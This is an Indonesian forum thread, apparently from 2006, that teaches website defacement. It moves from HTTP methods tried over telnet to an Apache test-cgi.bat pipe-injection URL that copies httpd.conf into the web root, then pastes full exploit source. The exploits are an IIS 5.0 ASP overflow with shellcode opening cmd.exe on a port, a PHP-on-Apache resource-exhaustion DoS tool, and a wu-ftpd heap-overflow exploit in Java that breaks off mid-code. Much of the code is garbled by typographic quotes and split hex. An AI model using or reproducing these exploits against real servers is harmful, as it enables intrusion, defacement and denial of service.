Catatan: Jika anda seorang newbie sejati yang tidak mengetahui tentang IP address maka bacalah artikel mengenai notasi pengalamatan IP agar mendapatkan gambaran yang jelas.

Write Access: Sebagaimana yang saya sarankan, anggota dari website saya mengarah melalui RFC (request for comment) pada protokol penting seperti HTTP (Hyper Text Transfer Protocol), TELNET, FTP (File Transfer Protocol), SMTP (Simple Mail Transfer Protocol) dsb, kesemuanya yang membaca RFC pada HTTP secara definitif akan mengetahui maksud dari Write Access pada suatu web server. Untuk itu siapapun yang tidak memilikinya datang melalui HTTP RFC, saya berikan gambaran singkat mengenai protokol HTTP.

HTTP merupakan bagian dari TCP/IP stack (koreksi saya jika salah). Yang dirancang dan dibuat dengan maksud berbagi file melalui internet. Sebagaimana yang dinyatakan dari nama HTTP (Hyper Text Transfer Protocol). Pada awalnya file akan diupload dan didownload dari server tersebut sesuai dengan protokol HTTP tanpa diperlukan jenis otentikasi apapun. Segera setelah dinyatakan bahwa jenis arsitektur ini merupakan pelanggaran keamanan nyata yang menyebabkan siapapun yang “setengah cerdas” dapat menulis write access ke server tersentu. Sekarang apa yang telah dilakukan adalah web server tersebut dirancang dan dikonfigurasi sedemikian rupa untuk memberikan write access hanya kepada direktori virtual terpilih.

Cobalah melakukan telnet ke suatu website dan bermain-main dengan mempraktekkan informasi megnenai server tersebut dan perilakunya. Berikut ini daftar perintah yang umum digunakan yang didukung oleh web server, sesuai ketentuan RFC dari HTTP.

GET : digunakan untukmengirim request untuk read access ke suatu file yang terletak pada server melalui web browser (client)

Contoh:

Microsoft Telnet>telnet astalavista.com 80
Connected to astalavista.com……
GET /index.html HTTP/1.1\r\n\r\n

Output:
Kode sumber HTML dari halaman index.html yang terletak pada server akan dikembalikan atau jika di request pada halaman server side seperti ASP atau JSP… maka secara dinamis menciptakan dan membuat halaman HTML.

PUT : digunakan untuk membuat suatu file pada server tersebut… membutuhkan write access pada direktori virtual tertentu dimana file tersebut dibuat.

Contoh:
Microsoft Telnet>telnet astalavista.com 80
Connected to astalavista.com……
PUT alyzing.txt HTTP/1.1\r\n\r\n

Output :
Kemungkinan besar anda akan mendapatkan pesan 403 Forbidden Error…sebagaimana halnya bahwa wwwroot tidak akan pernah memiliki write access..

DEL : untuk mengahpus suatu halaman pada webserver tersebut… memerlukan write access pada direktori virtual tertentu dimana file tersebut dihapus.

Contoh:
Microsoft Telnet>telnet astalavista.com 80
Connected to astalavista.com……
del /index.html HTTP/1.1\r\n\r\n

Output :
Kemungkinan besar anda akan mendapatkan pesan 403 Forbidden Error.. yang menyatakan bahwa wwwroot tidak dapat menggunakan write access..

ECHO : Printing tool.. sama halnya dengan file Batch pada DOS.. Outputnya dapat diarahkan..
Contoh:
Microsoft Telnet>telnet astalavista.com 80
Connected to astalavista.com……
ECHO defaced by Abhisek Datta >> /index.html HTTP/1.1\r\n\r\n

PROPFIND : Digunakan sebagai sebuah request untuk browsing direktori… (pada IIS… terdapat sebuah administrative tool yang digunakan untuk menganalisa web server)
Contoh:
Microsoft Telnet>telnet astalavista.com 80
Connected to astalavista.com……
PROPFIND / HTTP/1.1
Host:iis-server
Content-Length:0

Output :
Kemungkinan besar anda akan mendapatkan pesan 403 Forbidden Error… yang menyatakan bahwa wwwroot tidak menggunakan write access..

Untuk menguji permisi write access terhadap direktori dalam Microsoft IIS dengan cara yang sedikit rumit. Ikuti metode berikut ini:

Untuk menguji apakah permisi write dalam keadaan ‘enabled’ terhadap telnet anonymous web client menjadi kedalam port web server biasanya port TCP 80 dan buatlah request berikut ini:

PUT /scripts/abhisek.asp HTTP/1.1
Host: iis-server
Content-Length: 10

Pada bagian ini server akan meresponnya dengan pesan 100 Continue
HTTP/1.1 100 Continue
Server: Microsoft-IIS/5.0
Date: Thu, 28 Feb 2002 15:56:00 GMT

Saat menerima ini ketiklah 10 huruf
AAAAAAAAAA

HTTP/1.1 201 Created
Server: Microsoft-IIS/5.0
Date: Thu, 28 Feb 2002 15:56:08 GMT
Location: http://iis-server/dir/my_file.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND,
PROPPATCH, SEARCH, LOCK, UNLOCK

Jika server meresponnya dengan respon 201 Created maka permisi Write dalam keadaan ‘enabled’

Execution Access : Halaman Server side (ASP, JSP, PHP) ,dll (dynamic link libraries) etc yang seringkali digunakan saat ini pada website berbasiskan database yang secara dinamis membuat HTML dan mengirimkannya ke browser. Halaman server side ini dan file executable lainnya termasuk .dll dan .exe memerlukan execution privilege pada direktori virtual ditempat mereka berada. Umumnya seluruh file .dll, .asp, dan .exe memerlukan execution privilege yang berada dalam direktori virtual tunggal.

Directory Browsing : Seringkali web server (untuk lebih spesifik… direktori virtual dari web server) terkonfigurasi sedemikian rupa untuk menyediakan akses browsing direktori untuk seluruh client atau client khusus melalui otentikasi yang sesuai. Pada dasarnya browsing direktori dimaksudkan bahwa anda dapat menyusun daftar file dan folder yang ada dalam direktori virtual yang anda buat seakan-akan itu adalah computer anda. Untuk alasan keamanan banyak website mematikan fitur ini. Dengan exploit anda bisa mendapatkan Directory Listing dari suatu direktori virtual.

Ekploitasi terhadap Directory Listing pada Apache (win32) :

Satu dari sekian banyak Apache web server (win32) 2.1.x (saya tidak yakin mengenai versi) berisi default file .bat yang bernama test-cgi.bat dalam direktori cgi-bin. Yang sebenarnya tersedia juga agar administrator sistem dapat menguji privilege dari direktori cgi-bin yang berisikan seluruh script cgi dan perl. Tentunya direktori virtual cgi-bin memiliki execution permission.

Keadaan ini dieksploitasi untuk serangan. Pada dasarnya saat suatu file .bat pada Apache web server (win32) disebut Execution DOS (Disk Operating System) Shell yang dapat dieksekusi. Sekarang kita dapat menggunakan karakter | (pipe) selama memanggil file batch untuk mengeksekusi perintah pada remote server. Serangan URL akan terlihat seperti dibawah ini :

http://www.target.com/cgi-bin/test-cgi.bat?|copy+..\conf\httpd.conf+..\htdocs\httpd.c onf

Jadi dengan serangan URL ini apa yang telah saya lakukan adalah mengcopy file httpd.conf dari direktori conf yang pastinya memiliki read access terhadap Apache web root! seperti folder virtual htdocs. Sekarang kita bisa dengan mudah mendownload file httpd.conf menggunakan URL http://www.target.com/httpd.conf yang sekarang terletak pada Apache web root.

Catatan: Untuk hal ini bila anda tidak mengenal Apache dan tidak mengetahui apakah file httpd.conf tersebut? OK, dalam Apache anda harus mengonfigurasi seluruh web server menggunakan perintah dan script yang berada dalam file httpd.conf dalam folder c:\apache group\apache\conf dari instalasi default apache pada sistem windows umumnya. File ini berisikan seluruh setting web server sasaran dan dengan beberapa cara jika kita dapat mengatur penanganan file ini maka kita mendapatkan informasi yang jelas mengenai seluruh setting dari web server termasuk lokasi log file, directory permission, write access, authentication level dsb.

MEMERIKSA VULNERABILITY YANG ADA
Kebanyakan website yang terdeface dan dihack menggunakan vulnerability yang berkenaan dengan software server atau sistem operasi yang dijalankan oleh software server tersebut.

Banyak dari mereka yang disebut hacker mendeface website berdasarkan vulnerability yang ditemukan oleh orang-orang yang semestinya disebut “Hacker”.

Ada baiknya anda harus mengetahui apakah vulnerability itu? vulnerability sebenarnya adalah cacat yang ada pada arsitektur software yang memungkinkan seorang hacker atau malicious cracker memiliki kendali lebih jauh pada sistem atau membuat kewenangan perintah sistem terhadap server. Ada beberapa vulnerability yang terdapat pada seluruh software. Pada dasarnya, dahulu saya mendengar bahwa para hacker dimanfaatkan untuk menemukan cacat dan vulnerability pada software mereka sendiri. Tapi sekarang hanya beberapa orang yang masih melakukannya. Ada banyak situs yang bagus seperti:

http://www.securityfocus.com

http://www.packetstorm.org

http://www.guininski.com

http://www.insecure.org

http://www.securiteam.com

http://www.slashdot.org

http://www.technotronic.com

Situs-situs ini berisikan lebih dari cukup tentang vulnerability mutakhir yang akan membantu anda memulai sesuatu. Bahkan jika anda berpengalaman, saya yakin anda akan mendapatkan bantuan dari situs ini.

CODING EXPLOIT :
Katakanlah, anda menetapkan melakukan hacking website http://www.anisurrahman.net (beh!! Anisur akan menendang bokong saya jika dia membaca artikel ini). Menggunakan metode yang dijelaskan diatas, anda dapat dengan mudah menemukan bahwa website tersebut dijalankan pada software server Microsoft IIS 5.00. Sekarang waktunya untuk mencari exploit (saya memperkirakan bahwa anda bukanlah seorang hackeryang dapat menemukan vulnerability sendiri.. jika tidak.. anda tidak perlu membaca artikel ini). bahkan jika anda menemukan beberapa overflow atau malicious vulnerability pada software web server dari situs yang disebutkan diatas anda harus menulis program (dengan bahasa C atau Perl) untuk mengimplementasikan exploit terhadap vulnerability yang ada. Untuk hal ini anda harus memiliki pengetahuan yang baik mengenai latar belakang pemrograman socket. Jika anda tidak dapat menulis exploit anda sendiri anda bisa mendownload code exploit yang ditulis dalam bahasa seperti C, Perl, JAVA (sangat jarang). Tapi jika anda mendownload exploit yang memungkinkan anda mendapatkan root shell pada web server target yang ditulis dalam bahasa C, maka saat melakukan kompilasi, saya yakin anda akan menemukan banyak error karena syntak dan fungsi yang sedikit berbeda dari satu compiler dengan compiler lainnya. Sekarang anda akan menyatakan perlunya penguasaan pemrograman.

Berikut ini daftar dari vulnerability yang ada disertai code exploit.

1. Exploit ASP overflow ini akan membuka port 1111 dan membuat cmd.exe. Seharusnya tertulis abhwa setiap kali anda menjalankan exploit ini dan suatu pesan akan muncul bahwa exploit ini bekerja dengan sempurna. Bagaimanapun, tidaklah dimaksudkan bahwa anda bisa mendapatkan akses ke host target, karena pada beberapa kejadian ada kotak pesan yang terlihat pada terminal sasaran yang memberitahukan bahwa telah terjadi pelanggaran akses (Acess Violation).

/* Windows 2000 Server Exploit By CHINANSL Security Team.
Test on Windows 2000 Chinese Version, IIS 5.0 , not patched.
Warning:THIS PROGRAM WILL ONLY TEST.
CHINANSL Technology CO.,LTD http://www.chinansl.com
keji@chinansl.com
use MS VC++ to compile this piece of code
*/

#include “stdafx.h”
#include
#include
#include
#include
#pragma comment (lib,”Ws2_32″)

int main(int argc, char* argv[])
{
if(argc != 4)
{
printf(”%s ip port aspfilepath\n\n”,argv[0]);
printf(” ie. %s 127.0.0.1 80 /iisstart.asp\n”,argv[0]);
puts(” programed by keji@chinansl.com”);

return 0;
}

DWORD srcdata=0×01e2fb1c-4;//0×00457474;
file://address of SHELLCODE
DWORD jmpaddr=0×00457494; file://0×77ebf094;/ /0×01e6fcec; file://”\x1c\xfb\xe6\x01″; file://”\x0c\xfb\xe6\x01″;

char* destIP=argv[1];
char* destFile=argv[3];
int webport=atoi(argv[2]);
char* pad=”\xcc\xcc\xcc\xcc” “ADPA” “\x02\x02\x02\x02″ “PADP”; file://16 bytes

WSADATA ws;
SOCKET s;
long result=0;
if(WSAStartup(0×0101,&ws) != 0)
{
puts(”WSAStartup() error”);
return -1;
}

struct sockaddr_in addr;
addr.sin_family=AF_INET;
addr.sin_port=htons(webport);
addr.sin_addr.s_addr=inet_addr(destIP);
s=socket(AF_INET,SOCK_STREAM,0);
if(s==-1)
{
puts(”Socket create error”);
return -1;
}

if(connect(s,(struct sockaddr *)&addr,sizeof(addr)) == -1)
{
puts(”Cannot connect to the specified host”);
return -1;
}

char buff[4096];
char* shellcode=”\x55\x8b\xec\x33\xc0\xb0\xf0\xf7\xd8\x0 3\xe0\x8b\xfc\x33\xc9\x89″
“\x8d\x2c\xff\xff\xff\xb8\x6b\x65\x72\x6e\xab\xb8\ x65\x6c\x33\x32″
“\xab\x32\xc0\xaa\xb8\x77\x73\x6f\x63\xab\xb8\x6b\ x33\x32\x2e\xab”
“\x4f\x32\xc0\xaa\x8d\x7d\x80\xb8\x63\x6d\x64\x2e\ xab\x32\xc0\x4f”
“\xaa\xb8\x23\x80\xe7\x77\x8d\x9d\x10\xff\xff\xff\ x53\xff\xd0\x89″
“\x45\xfc\xb8\x23\x80\xe7\x77\x8d\x9d\x19\xff\xff\ xff\x53\xff\xd0″
“\x89\x45\xf8\xbb\x4b\x56\xe7\x77\x6a\x47\xff\x75\ xfc\xff\xd3\x89″
“\x45\xf4\x6a\x48\xff\x75\xfc\xff\xd3\x89\x45\xf0\ x33\xf6\x66\xbe”
“\x1d\x02\x56\xff\x75\xfc\xff\xd3\x89\x45\xec\x66\ xbe\x3e\x02\x56″
“\xff\x75\xfc\xff\xd3\x89\x45\xe8\x66\xbe\x0f\x03\ x56\xff\x75\xfc”
“\xff\xd3\x89\x45\xe4\x66\xbe\x9d\x01\x56\xff\x75\ xfc\xff\xd3\x89″
“\x85\x34\xff\xff\xff\x66\xbe\xc4\x02\x56\xff\x75\ xfc\xff\xd3\x89″
“\x85\x28\xff\xff\xff\x33\xc0\xb0\x8d\x50\xff\x75\ xfc\xff\xd3\x89″
“\x85\x18\xff\xff\xff\x6a\x73\xff\x75\xf8\xff\xd3\ x89\x45\xe0\x6a”
“\x17\xff\x75\xf8\xff\xd3\x89\x45\xdc\x6a\x02\xff\ x75\xf8\xff\xd3″
“\x89\x45\xd8\x33\xc0\xb0\x0e\x48\x50\xff\x75\xf8\ xff\xd3\x89\x45″
“\xd4\x6a\x01\xff\x75\xf8\xff\xd3\x89\x45\xd0\x6a\ x13\xff\x75\xf8″
“\xff\xd3\x89\x45\xcc\x6a\x10\xff\x75\xf8\xff\xd3\ x89\x45\xc8\x6a”
“\x03\xff\x75\xf8\xff\xd3\x89\x85\x1c\xff\xff\xff\ x8d\x7d\xa0\x32″
“\xe4\xb0\x02\x66\xab\x66\xb8\x04\x57\x66\xab\x33\ xc0\xab\xf7\xd0″
“\xab\xab\x8d\x7d\x8c\x33\xc0\xb0\x0e\xfe\xc8\xfe\ xc8\xab\x33\xc0″
“\xab\x40\xab\x8d\x45\xb0\x50\x33\xc0\x66\xb8\x01\ x01\x50\xff\x55″
“\xe0\x33\xc0\x50\x6a\x01\x6a\x02\xff\x55\xdc\x89\ x45\xc4\x6a\x10″
“\x8d\x45\xa0\x50\xff\x75\xc4\xff\x55\xd8\x6a\x01\ xff\x75\xc4\xff”
“\x55\xd4\x33\xc0\x50\x50\xff\x75\xc4\xff\x55\xd0\ x89\x45\xc0\x33″
“\xff\x57\x8d\x45\x8c\x50\x8d\x45\x98\x50\x8d\x45\ x9c\x50\xff\x55″
“\xf4\x33\xff\x57\x8d\x45\x8c\x50\x8d\x45\x90\x50\ x8d\x45\x94\x50″
“\xff\x55\xf4\xfc\x8d\xbd\x38\xff\xff\xff\x33\xc9\ xb1\x44\x32\xc0″
“\xf3\xaa\x8d\xbd\x38\xff\xff\xff\x33\xc0\x66\xb8\ x01\x01\x89\x47″
“\x2c\x8b\x45\x94\x89\x47\x38\x8b\x45\x98\x89\x47\ x40\x89\x47\x3c”
“\xb8\xf0\xff\xff\xff\x33\xdb\x03\xe0\x8b\xc4\x50\ x8d\x85\x38\xff”
“\xff\xff\x50\x53\x53\x53\x6a\x01\x53\x53\x8d\x4d\ x80\x51\x53\xff”
“\x55\xf0\x33\xc0\xb4\x04\x50\x6a\x40\xff\x95\x34\ xff\xff\xff\x89″
“\x85\x30\xff\xff\xff\x90\x33\xdb\x53\x8d\x85\x2c\ xff\xff\xff\x50″
“\x53\x53\x53\xff\x75\x9c\xff\x55\xec\x8b\x85\x2c\ xff\xff\xff\x85″
“\xc0\x74\x49\x33\xdb\x53\xb7\x04\x8d\x85\x2c\xff\ xff\xff\x50\x53″
“\xff\xb5\x30\xff\xff\xff\xff\x75\x9c\xff\x55\xe8\ x85\xc0\x74\x6d”
“\x33\xc0\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30\ xff\xff\xff\xff”
“\x75\xc0\xff\x55\xcc\x83\xf8\xff\x74\x53\xeb\x10\ x90\x90\x90\x90″
“\x90\x90\x6a\x32\xff\x95\x28\xff\xff\xff\xeb\x99\ x90\x90\x33\xc0″
“\x50\xb4\x04\x50\xff\xb5\x30\xff\xff\xff\xff\x75\ xc0\xff\x55\xc8″
“\x83\xf8\xff\x74\x28\x89\x85\x2c\xff\xff\xff\x33\ xc0\x50\x8d\x85″
“\x2c\xff\xff\xff\x50\xff\xb5\x2c\xff\xff\xff\xff\ xb5\x30\xff\xff”
“\xff\xff\x75\x90\xff\x55\xe4\x85\xc0\x74\x02\xeb\ xb4\xff\x75\xc4″
“\xff\x95\x1c\xff\xff\xff\xff\x75\xc0\xff\x95\x1c\ xff\xff\xff\x6a”
“\xff\xff\x95\x18\xff\xff\xff”;

char* s1=”POST “;// HTTP/1.1\r\n”;
char* s2=”Accept: */*\r\n”;
char* s4=”Content-Type: application/x-www-
form-urlencoded\r\n”;
char* s5=”Transfer-Encoding:
chunked\r\n\r\n”;
char* sc=”0\r\n\r\n\r\n”;

char shellcodebuff[1024*8];
memset(shellcodebuff,0×90,sizeof
(shellcodebuff));
memcpy(&shellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1],shellcode,strlen(shellcode));
shellcodebuff[sizeof(shellcodebuff)-1] = 0;

char sendbuff[1024*16];
memset(sendbuff,0,1024*16);

sprintf(sendbuff,”%s%s?%s HTTP/1.1\r\n%sHost: %s\r\n%s%s10\r\n%s\r\n4\r\nAAAA\r\n4\r\nBBBB\r\n%s “, s1,
destFile, shellcodebuff, s2, destIP, s4,s 5, pad/*,srcdata,jmpaddr*/, sc);

int sendlen=strlen(sendbuff);
*(DWORD *)strstr(sendbuff,”BBBB”) = jmpaddr;
*(DWORD *)strstr(sendbuff,”AAAA”) = srcdata;

result=send(s,sendbuff,sendlen,0);
if(result == -1 )
{
puts(”Send shellcode error!”);
return -1;
}

memset(buff,0,4096);
result=recv(s,buff,sizeof(buff),0);

if(strstr(buff,””) != NULL)
{
shutdown(s,0);
closesocket(s);

puts(”Send shellcode error!Try again!”);
return -1;
}

shutdown(s,0);
closesocket(s);
printf(”\nUse to connect to the host\n”,destIP);
puts(”If you cannot connect to the host,try run this program again!”);

return 0;
}
__________________
GhoStM@nZ-e.V.o
H N G UNIT
Reply With Quote
dede23
View Public Profile
Send a private message to dede23
Visit dede23’s homepage!
Find all posts by dede23

#2
Old 27-07-2006, 01:07 PM
dede23’s Avatar
dede23 dede23 is offline
IndoForum Junior B

No. Urut: 2268
Join Date: Jun 2006
Location: G-UNIT
Posts: 2,547
Rep Power: 3
dede23
Send a message via MSN to dede23 Send a message via Yahoo to dede23 Send a message via Skype™ to dede23
2.
/* PHP-APACHE.C
* By Matthew Murphy
* Exhaust CGI Resources via PHP on Apache
*
* Calling PHP with no parameters causes it to
* never terminate; the process must be killed
* by the server, the OS, or the admin.
*
* PHP on Apache requires you to configure a
* virtual to load PHP out of. PHP implements
* a “cgi.force_redirect” value to require that
* a certain environment variable be set to
* allow PHP to run further.
*
* However, an empty command-line *still* will
* cause PHP to hang. If a remote user does
* this for a lengthy amount of time, the server
* may no longer launch PHP or other server-side
* components.
*
* NOTE: The vulnerable config is on Apache,
* but other servers can still be exploited
* if they offer PHP.EXE (or an SAPI) directly.
*
* Usage: php-apache [phpbin] [port] [maxsocks]
*/

#include
#include

#ifdef _WIN32
#define _WINSOCKAPI_ /* Fix for Winsock.h redef errors */
#include /* WinSock API calls… */
#define WSA_VER 0×0101 /* WinSock ver. to use */
#pragma comment(lib, “wsock32.lib”) /* Check your compiler’s docs… */
#else
#include
#include
#include
#include
#include
#include
#include
#endif

#define DEF_PHP “/php/php” /* This is used as the PHP
* path if one isn’t set
*/

static char php_buf[] = “GET %s HTTP/1.0\x0d\x0a\x0d\x0a”;

void main(int argc, char *argv[]) {
char host[257];
char binpath[257];
int maxsocks;
char request[300];
unsigned short port;
struct hostent *he;
struct sockaddr_in sa_in;
#ifdef _WIN32
WSADATA wsa_prov;
SOCKET s;
#else
int s;
#endif
printf(”PHP-APACHE.C by Matthew Murphy\x0d\x0a”);
printf(”Exhausting CGI resources w/ PHP on Apache\x0d\x0a\x0d\x0a”);
maxsocks = 0;
strcpy(&binpath[0], DEF_PHP);
#ifdef _WIN32
if (!WSAStartup(WSA_VER, &wsa_prov) == 0) {
printf(”ERROR: Windows Sockets init failed!”);
exit(1);
}
#endif
port = (unsigned short)htons(80);
switch (argc) {
case 5:
maxsocks = atoi(argv[4]);
case 4:
port = htons((unsigned short)atoi(argv[2]));
case 3:
if (strlen(argv[2]) > 256) {
printf(”ERROR: 256 char path limit exceeded in ‘phpbin’ argument.”);
exit(1);
}
strcpy(&binpath[0], argv[2]);
case 2:
if (strlen(argv[1]) > 256) {
printf(”ERROR: No host should be over 256 chars!”);
exit(1);
}
strcpy(&host[0], argv[1]);
break;
default:
printf(”Usage: php-apache [port] [maxsocks] [phpbin]\x0d\x0a\x0d\x0ahost – The IP/DNS name to attack\x0d\x0aport – The port the HTTP service normally runs on (default: 80)\x0d\x0amaxsocks – The maximum number of connections to establish (creates a finite flood). A zero value means continue until termination (default: 0)\x0d\x0aphpbin – The virtual path to the PHP binary (e.g, /php/php[.exe]; default: /php/php)”);
exit(0);
}
if (maxsocks == 0) {
maxsocks–;
}
sa_in.sin_family = AF_INET;
sa_in.sin_port = (unsigned short)port;
he = gethostbyname(&host[0]);
if (he == NULL) {
printf(”ERROR: DNS resolution failed, or unknown host.”);
exit(1);
}
#ifdef _WIN32
sa_in.sin_addr.S_un.S_addr = (unsigned long)*(unsigned long *)he->h_addr;
#else
sa_in.sin_addr.S_addr = (unsigned long)*(unsigned long *)he->h_addr;
#endif
sprintf(&request[0], &php_buf[0], &binpath[0]);
while (!maxsocks == 0) {
s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (s < 0) {
printf(“Couldn’t create socket…\x0d\x0aIf you continue to receive this error, terminate the program.”);
} else {
if (!connect(s, (const struct sockaddr FAR *)&sa_in, sizeof(struct sockaddr_in)) == 0) {
printf(“Couldn’t connect…\x0d\x0aIf you continue to receive this error, terminate the program.”);
} else {
send(s, (char FAR *)&request[0], strlen(&request[0]), 0);

/* If the exploit isn’t using up server resources
* try removing this — the server may be killing
* the CGI after a disconnect.
*/

#ifdef _WIN32
shutdown(s, SD_BOTH);
closesocket(s);
#else
close(s);
#endif
}
}
if (!maxsocks == -1) {
maxsocks–;
}
}
return;
}

————————————————————————

3. /*
* wu-ftpd 2.6.[0/1] remote heap overflow exploit
* wu-ftpd 2.5.* does also overflow and disconnect when you “cwd ~{“
* but it does not seem to be exploitable for some reason…
*
* Original Code by zen-parse
* This code was finished by CraigTM at 23-01-2002
*
* thanks to Krissa from #java@efnet for this:
* From the Integer API docs: Integer.parseInt(”-FF”, 16) returns -255
*
* thanks to dvorak for inspiring me; it works() now
*
* This works (nearly) like zen-parses code, but gives you a shell…
*
* I wanted to challenge myself and prove that remote exploits can be
* done with java…(hello pr0ix!)…I also had way too much time
*
* java woot [IP] {heap}
*
* CraigTM [ElectronicSouls]
*
* P.S.: I know that the Reader/Write class sucks, but it was done within minutes
* P.P.S.:Have fun with the new targets
*
*/

import java.io.*;
import java.net.*;
import java.util.*;

class woot
{

file://type, got, inpbuf, string to check for (autodetect)
static String targets[] =
{
“RH7.0 – 2.6.1(1) Wed Aug 9 05:54:50 EDT 2000″, // by zen-parse
“08070cb0″,”08084600″,”2.6.1(1) WED AUG 9 05:54:50 EDT 2000″,

“RH7.2 – wu-2.6.1-18 by kanix – verified by CraigTM”, // doesnt seem to be
“08072af8″,”08085900″,”WU-2.6.1-18″, // exploitable…

file://”wu-2.6.1(2) by zen-parse”, // zen-parse’s common compile
file://”0806ca48″,”0807e380″,”WU-2.6.1(2)”, // seems useless in the wild

“wu-2.6.0(x) from www.wu-ftpd.org by CraigTM”, file://done by me
“0806bae4″,”0807d600″,”WU-2.6.0(”,

“wu-2.6.1(x) from www.wu-ftpd.org by CraigTM”, file://done by me
“0806c028″,”0807db40″,”WU-2.6.1(”,

null
};

file://socket stuff
static DataInputStream sin;
static PrintStream sout;
static Socket s = null;

file://shellcode
static char sc[]={0×55,0×89,0xe5,0×31,0xc0,0×31,0xdb,0×31,0xc9,0xb 0,0×17,
0xcd,0×80,0xb0,0×2e,0xcd,0×80,0xeb,0×43,0×5e,0xb0, 0×27,
0×8d,0×5e,0×09,0xb1,0xed,0xcd,0×80,0×31,0xc9,0×31, 0xc0,
0xb0,0×3d,0xcd,0×80,0xba,0×2e,0×2e,0×2f,0xff,0×8d, 0×5d,
0×04,0xb1,0×10,0×89,0×55,0×04,0×83,0xc5,0×03,0xe0, 0xf8,
0×89,0×4d,0×04,0xb0,0×3d,0xcd,0×80,0×89,0xf3,0×89, 0×75,
0×08,0×89,0×4d,0×0c,0xb0,0×0b,0×8d,0×4d,0×08,0×8d, 0×55,
0×0c,0xcd,0×80,0×31,0xc0,0xb0,0×01,0xcd,0×80,0xe8, 0xb8,0xff,0xff,0xff};
static int sclength=91;

file://guess what?
static String victim=””;

file://your shell
static Thread reader, writer;

file://vars
static int m=0;

static long tmp_got;
static long tmp_heap;
static long tmp_inpbuf;

void connect(String Server)
{
try
{

s = new Socket(Server, 21);
sin = new DataInputStream (s.getInputStream());
sout = new PrintStream (s.getOutputStream());

}//try
catch (IOException e){System.out.println(”Error Connecting:”+e);System.exit(-1);}
}//connect()

boolean allowsAnonymous()
{
String line=null;

try
{
connect(victim);
System.out.print(”.”);

boolean Ano=false;
if(s!=null)sout.println(”USER planetsubhro”);

System.out.print(”.”);

while(true)
{
if(s==null)break;
line=sin.readLine();
if(line==null)break;

if(line.indexOf(”220″)-1)
{
m=(i/4)+1;
break;
}
}

System.out.print(”.”);

if(s!=null)
{
sout.println(”PASS sms1324″);
sout.println(”QUIT”);
}

while(Ano==false)
{
line=sin.readLine();
if(s==null || line==null)break;

if(line.indexOf(”331″)>-1)
{
line=sin.readLine();
if(line==null || s==null)break;
}

if(line.indexOf(”230″)>-1)
return true;

if(line.indexOf(”530″)>-1 || line.indexOf(”531″)>-1)
return false;

}//while (Ano==false)
}//while(true)

file://close socket again
if(s!=null)
{
try
{
s.close();s=null;sin=null;sout=null;
}
catch(IOException e){}
}

}//try
catch (IOException e){}

return false;

}//Anonymous check + get server

void shell()
{
reader.setPriority(6);
writer.setPriority(5);

reader.start();
writer.start();

Thread t = Thread.currentThread();
try {t.sleep(1000);} catch (InterruptedException e) {}

woot.sout.println(”uname -a;id;”);
}

void dosend(String s)
{
for(int i=0;i“);
DataInputStream in = new DataInputStream (System.in);
victim=in.readLine();

}
catch (IOException e){}
}//getTarget()

boolean works(long n)
{
String v0=Long.toHexString(n);

String elements[]=new String[5];
elements[0]=v0.substring(0,2);
elements[1]=v0.substring(2,4);
elements[2]=v0.substring(4,6);
elements[3]=v0.substring(6,8);

for(int i=0;elements[i]!=null;i++)
{
if(elements[i].equals(”00″))return false; file://0×00 -> null byte
if(elements[i].equals(”0a”))return false; file://0×0a -> \n
if(elements[i].equals(”40″))return false; file://0×40 -> @
}

return true;
}

boolean force()
{
char ok;

long l;
long got,inp;

long en=0+(256*1024);
long st=2048;

System.out.println(”++ Option #”+m+” chosen.”);
m=(m-1)*4;

System.out.println(”++ Exploiting “+targets[m]+”\n”);

long tmp = Long.parseLong(targets[m+2],16);

st= st + tmp + Long.parseLong(”6400″, 16);
en= en + tmp + Long.parseLong(”6400″, 16);

got=Long.parseLong(targets[m+1],16);
inp=Long.parseLong(targets[m+2],16);

tmp_got=got-12;
tmp_inpbuf=inp+20;

System.out.println(”got:\t”+Long.toHexString(tmp_g ot+12)+”\ninpbuf:\t”+Long.toHexString(tmp_inpbuf-20));
System.out.println(”brute forcing heap (from “+Long.toHexString(st)+” to “+Long.toHexString(en)+”):”);

for(l=st;l<en;l+=360)
{
for(m=0;(m!=16&&m<32);m+=4)
{

if(works(m+l+st))
{

System.out.print(“.”);
tmp_heap=l+m;

if(exploit(“scan”))
{
System.out.println(“\nheap:\t”+Long.toHexString(tm p_heap)+”\n”);
System.out.println(“\nTrying to get shell…”);
return true;
}

}
else // if(!works(m+l+st))
System.out.print(“*”);

}//for
}//for

return false;
}//force()

boolean exploit(String mode)
{

StringBuffer buf=new StringBuffer();
StringBuffer buf2=new StringBuffer(“”);

String got[] = new String[5];
String heap[] = new String[5];
String inpbuf[]=new String[5];

String hexgot = Long.toHexString(tmp_got);
String hexheap = Long.toHexString(tmp_heap);
String hexinpbuf = Long.toHexString(tmp_inpbuf);

//////////////////// PUT THE GOT ADDRESS ///////////////////////////
if(hexgot.length()==7)
{
got[0] = “0″+hexgot.substring(0,1);
got[1] = hexgot.substring(1,3);
got[2] = hexgot.substring(3,5);
got[3] = hexgot.substring(5,7);
}

if(hexgot.length()==8)
{
got[0] = hexgot.substring(0,2);
got[1] = hexgot.substring(2,4);
got[2] = hexgot.substring(4,6);
got[3] = hexgot.substring(6,8);
}

//////////////////// PUT THE HEAP ADDRESS ///////////////////////////
if(hexheap.length()==7)
{
heap[0] = “0″+hexheap.substring(0,1);
heap[1] = hexheap.substring(1,3);
heap[2] = hexheap.substring(3,5);
heap[3] = hexheap.substring(5,7);
}

if(hexheap.length()==8)
{
heap[0] = hexheap.substring(0,2);
heap[1] = hexheap.substring(2,4);
heap[2] = hexheap.substring(4,6);
heap[3] = hexheap.substring(6,8);
}

//////////////////// PUT THE INPBUF ///////////////////////////
if(hexinpbuf.length()==7)
{
inpbuf[0] = “0″+hexinpbuf.substring(0,1);
inpbuf[1] = hexinpbuf.substring(1,3);
inpbuf[2] = hexinpbuf.substring(3,5);
inpbuf[3] = hexinpbuf.substring(5,7);
}

if(hexinpbuf.length()==8)
{
inpbuf[0] = hexinpbuf.substring(0,2);
inpbuf[1] = hexinpbuf.substring(2,4);
inpbuf[2] = hexinpbuf.substring(4,6);
inpbuf[3] = hexinpbuf.substring(6,8);
}

file://fill buffer with nops
for(int i=0;i!=480;i++)
buf2.append((char)0×90);

// fill the buffer with chunks. overwrites the syslog call pointer with
// address of our shellcode.
for(int l=0;l<460;l+=16)
{

buf2.setCharAt(l+0,(char)Integer.parseInt(“F0″, 16));
